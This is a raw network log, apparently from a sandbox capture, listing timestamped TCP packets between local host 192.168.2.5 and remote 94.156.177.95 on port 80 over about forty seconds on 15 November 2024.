Nov 15, 2024 18:14:42.666273117 CET	49815	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:42.671082973 CET	80	49815	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:43.611865044 CET	80	49815	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:43.612000942 CET	49815	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:43.617332935 CET	80	49815	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:43.617410898 CET	49815	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:43.768861055 CET	49820	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:43.773901939 CET	80	49820	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:43.773983002 CET	49820	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:43.775824070 CET	49820	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:43.780778885 CET	80	49820	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:43.780827045 CET	49820	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:43.785681963 CET	80	49820	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:44.788902044 CET	80	49820	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:44.789084911 CET	49820	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:44.796883106 CET	80	49820	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:44.796950102 CET	49820	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:44.935941935 CET	49827	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:44.940938950 CET	80	49827	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:44.941025019 CET	49827	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:44.943254948 CET	49827	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:44.948101997 CET	80	49827	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:44.948157072 CET	49827	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:44.952967882 CET	80	49827	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:47.376245022 CET	80	49827	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:47.376347065 CET	49827	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:47.382328987 CET	80	49827	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:47.382401943 CET	49827	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:47.552444935 CET	49839	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:47.558515072 CET	80	49839	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:47.558608055 CET	49839	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:47.560796976 CET	49839	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:47.565681934 CET	80	49839	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:47.565743923 CET	49839	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:47.571350098 CET	80	49839	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:48.529079914 CET	80	49839	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:48.529207945 CET	49839	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:48.534810066 CET	80	49839	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:48.534904957 CET	49839	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:48.719337940 CET	49845	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:48.724423885 CET	80	49845	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:48.724785089 CET	49845	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:48.727335930 CET	49845	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:48.732336998 CET	80	49845	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:48.732748032 CET	49845	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:48.737664938 CET	80	49845	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:49.701478958 CET	80	49845	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:49.701579094 CET	49845	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:49.707073927 CET	80	49845	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:49.707143068 CET	49845	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:49.853916883 CET	49851	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:49.859052896 CET	80	49851	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:49.859138012 CET	49851	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:49.861510992 CET	49851	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:49.866580963 CET	80	49851	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:49.866642952 CET	49851	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:49.871684074 CET	80	49851	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:50.823755026 CET	80	49851	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:50.823889971 CET	49851	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:50.829216003 CET	80	49851	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:50.829287052 CET	49851	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:51.003380060 CET	49856	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:51.008445024 CET	80	49856	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:51.008591890 CET	49856	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:51.010651112 CET	49856	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:51.015629053 CET	80	49856	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:51.015683889 CET	49856	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:51.020719051 CET	80	49856	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:51.958895922 CET	80	49856	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:51.959023952 CET	49856	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:51.964277983 CET	80	49856	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:51.964364052 CET	49856	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:52.104157925 CET	49862	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:52.109137058 CET	80	49862	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:52.109241009 CET	49862	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:52.111242056 CET	49862	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:52.116130114 CET	80	49862	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:52.116189003 CET	49862	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:52.121237040 CET	80	49862	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:53.063715935 CET	80	49862	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:53.063827991 CET	49862	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:53.069205046 CET	80	49862	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:53.069272995 CET	49862	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:53.219927073 CET	49869	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:53.224977970 CET	80	49869	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:53.225189924 CET	49869	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:53.226959944 CET	49869	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:53.231920958 CET	80	49869	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:53.231993914 CET	49869	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:53.236845016 CET	80	49869	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:54.207930088 CET	80	49869	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:54.208035946 CET	49869	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:54.213464022 CET	80	49869	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:54.213531017 CET	49869	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:54.400763035 CET	49875	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:54.405935049 CET	80	49875	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:54.406023026 CET	49875	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:54.408966064 CET	49875	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:54.415757895 CET	80	49875	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:54.415832996 CET	49875	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:54.420773029 CET	80	49875	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:55.402070999 CET	80	49875	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:55.402259111 CET	49875	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:55.434663057 CET	80	49875	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:55.434768915 CET	49875	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:55.555206060 CET	49880	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:55.560431957 CET	80	49880	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:55.560527086 CET	49880	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:55.562556982 CET	49880	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:55.567430019 CET	80	49880	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:55.567481041 CET	49880	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:55.572340965 CET	80	49880	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:56.541213036 CET	80	49880	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:56.541320086 CET	49880	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:56.546595097 CET	80	49880	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:56.546653032 CET	49880	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:56.685698032 CET	49885	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:56.690877914 CET	80	49885	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:56.690978050 CET	49885	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:56.692954063 CET	49885	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:56.697822094 CET	80	49885	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:56.697887897 CET	49885	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:56.702716112 CET	80	49885	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:57.675513029 CET	80	49885	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:57.675628901 CET	49885	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:57.681468964 CET	80	49885	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:57.681538105 CET	49885	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:57.876365900 CET	49889	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:57.881298065 CET	80	49889	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:57.881392002 CET	49889	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:57.883132935 CET	49889	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:57.888004065 CET	80	49889	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:57.888076067 CET	49889	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:57.892930031 CET	80	49889	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:59.316334963 CET	80	49889	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:59.316567898 CET	49889	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:59.322191954 CET	80	49889	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:59.322273016 CET	49889	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:59.466033936 CET	49897	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:59.470978975 CET	80	49897	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:59.471055984 CET	49897	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:59.473073006 CET	49897	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:59.477909088 CET	80	49897	94.156.177.95	192.168.2.5
Nov 15, 2024 18:14:59.477956057 CET	49897	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:14:59.482805014 CET	80	49897	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:00.437112093 CET	80	49897	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:00.437228918 CET	49897	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:00.442485094 CET	80	49897	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:00.442548037 CET	49897	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:00.610580921 CET	49901	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:00.615607023 CET	80	49901	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:00.615699053 CET	49901	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:00.617867947 CET	49901	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:00.622642994 CET	80	49901	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:00.622720003 CET	49901	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:00.627526999 CET	80	49901	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:01.556570053 CET	80	49901	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:01.556689024 CET	49901	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:01.562051058 CET	80	49901	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:01.562138081 CET	49901	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:01.703949928 CET	49905	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:01.708884001 CET	80	49905	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:01.709014893 CET	49905	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:01.711424112 CET	49905	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:01.716403961 CET	80	49905	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:01.716470003 CET	49905	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:01.721641064 CET	80	49905	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:02.676476955 CET	80	49905	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:02.676611900 CET	49905	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:02.681974888 CET	80	49905	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:02.682048082 CET	49905	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:02.830899954 CET	49909	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:02.835962057 CET	80	49909	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:02.836040020 CET	49909	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:02.838454962 CET	49909	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:02.843296051 CET	80	49909	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:02.843350887 CET	49909	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:02.848213911 CET	80	49909	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:03.786936998 CET	80	49909	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:03.787031889 CET	49909	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:03.792788982 CET	80	49909	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:03.792860031 CET	49909	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:03.931718111 CET	49915	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:03.936831951 CET	80	49915	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:03.937127113 CET	49915	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:03.939058065 CET	49915	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:03.943986893 CET	80	49915	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:03.944044113 CET	49915	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:03.948930025 CET	80	49915	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:04.910248995 CET	80	49915	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:04.910372019 CET	49915	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:04.915935993 CET	80	49915	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:04.916019917 CET	49915	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:05.067264080 CET	49920	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:05.072072983 CET	80	49920	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:05.072144985 CET	49920	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:05.074208021 CET	49920	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:05.079082966 CET	80	49920	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:05.079129934 CET	49920	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:05.083946943 CET	80	49920	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:06.064785957 CET	80	49920	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:06.064903021 CET	49920	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:06.070493937 CET	80	49920	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:06.070569992 CET	49920	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:06.220298052 CET	49925	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:06.225183010 CET	80	49925	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:06.225264072 CET	49925	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:06.227369070 CET	49925	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:06.232211113 CET	80	49925	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:06.232263088 CET	49925	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:06.237056971 CET	80	49925	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:07.206125021 CET	80	49925	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:07.206218004 CET	49925	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:07.212158918 CET	80	49925	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:07.212239981 CET	49925	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:07.359045029 CET	49931	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:07.365060091 CET	80	49931	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:07.365199089 CET	49931	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:07.366914988 CET	49931	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:07.371743917 CET	80	49931	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:07.371818066 CET	49931	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:07.376861095 CET	80	49931	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:08.362751007 CET	80	49931	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:08.362962961 CET	49931	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:08.368386030 CET	80	49931	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:08.368444920 CET	49931	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:08.515743971 CET	49935	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:08.520544052 CET	80	49935	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:08.520612955 CET	49935	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:08.522666931 CET	49935	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:08.527781010 CET	80	49935	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:08.527825117 CET	49935	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:08.532773018 CET	80	49935	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:09.478656054 CET	80	49935	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:09.478765965 CET	49935	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:09.483922958 CET	80	49935	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:09.483993053 CET	49935	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:09.632822990 CET	49941	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:09.638113022 CET	80	49941	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:09.639178038 CET	49941	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:09.641161919 CET	49941	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:09.646018982 CET	80	49941	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:09.646080971 CET	49941	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:09.650880098 CET	80	49941	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:10.588184118 CET	80	49941	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:10.588289022 CET	49941	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:10.593620062 CET	80	49941	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:10.593710899 CET	49941	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:10.726550102 CET	49947	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:10.731408119 CET	80	49947	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:10.731492043 CET	49947	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:10.733527899 CET	49947	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:10.738434076 CET	80	49947	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:10.738507986 CET	49947	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:10.743304014 CET	80	49947	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:11.696425915 CET	80	49947	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:11.699501038 CET	49947	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:11.704837084 CET	80	49947	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:11.704915047 CET	49947	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:11.896308899 CET	49952	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:11.901453018 CET	80	49952	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:11.901566029 CET	49952	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:11.904120922 CET	49952	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:11.908993959 CET	80	49952	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:11.909050941 CET	49952	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:11.914104939 CET	80	49952	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:12.850373983 CET	80	49952	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:12.850507021 CET	49952	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:12.855999947 CET	80	49952	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:12.857485056 CET	49952	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:13.018143892 CET	49959	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:13.023185968 CET	80	49959	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:13.025691032 CET	49959	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:13.027446985 CET	49959	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:13.032351971 CET	80	49959	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:13.033206940 CET	49959	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:13.038219929 CET	80	49959	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:13.986828089 CET	80	49959	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:13.986958981 CET	49959	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:13.992144108 CET	80	49959	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:13.992336988 CET	49959	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:14.132050991 CET	49965	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:14.137096882 CET	80	49965	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:14.137207031 CET	49965	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:14.138925076 CET	49965	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:14.143815994 CET	80	49965	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:14.143908978 CET	49965	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:14.148812056 CET	80	49965	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:15.095793962 CET	80	49965	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:15.095885992 CET	49965	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:15.100964069 CET	80	49965	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:15.101020098 CET	49965	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:15.248584986 CET	49971	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:15.253520012 CET	80	49971	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:15.253607988 CET	49971	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:15.256006002 CET	49971	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:15.260910988 CET	80	49971	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:15.260992050 CET	49971	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:15.265898943 CET	80	49971	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:16.190433025 CET	80	49971	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:16.190598011 CET	49971	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:16.196125031 CET	80	49971	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:16.196284056 CET	49971	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:16.341200113 CET	49976	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:16.346213102 CET	80	49976	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:16.346329927 CET	49976	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:16.349315882 CET	49976	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:16.354249001 CET	80	49976	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:16.354360104 CET	49976	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:16.359308958 CET	80	49976	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:17.330138922 CET	80	49976	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:17.330231905 CET	49976	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:17.335539103 CET	80	49976	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:17.335617065 CET	49976	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:17.476037979 CET	49984	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:17.481062889 CET	80	49984	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:17.481215000 CET	49984	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:17.483021975 CET	49984	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:17.487926960 CET	80	49984	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:17.488008976 CET	49984	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:17.492923021 CET	80	49984	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:18.442526102 CET	80	49984	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:18.444210052 CET	49984	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:18.454312086 CET	80	49984	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:18.454499006 CET	49984	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:18.636404037 CET	49991	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:18.641396046 CET	80	49991	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:18.641468048 CET	49991	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:18.643546104 CET	49991	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:18.648587942 CET	80	49991	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:18.648637056 CET	49991	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:18.653789043 CET	80	49991	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:19.617989063 CET	80	49991	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:19.618197918 CET	49991	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:19.624026060 CET	80	49991	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:19.624094009 CET	49991	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:19.759004116 CET	49999	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:19.763854980 CET	80	49999	94.156.177.95	192.168.2.5
Nov 15, 2024 18:15:19.763931036 CET	49999	80	192.168.2.5	94.156.177.95
Nov 15, 2024 18:15:19.766031981 CET	49999	80	192.168.2.5	94.156.177.95
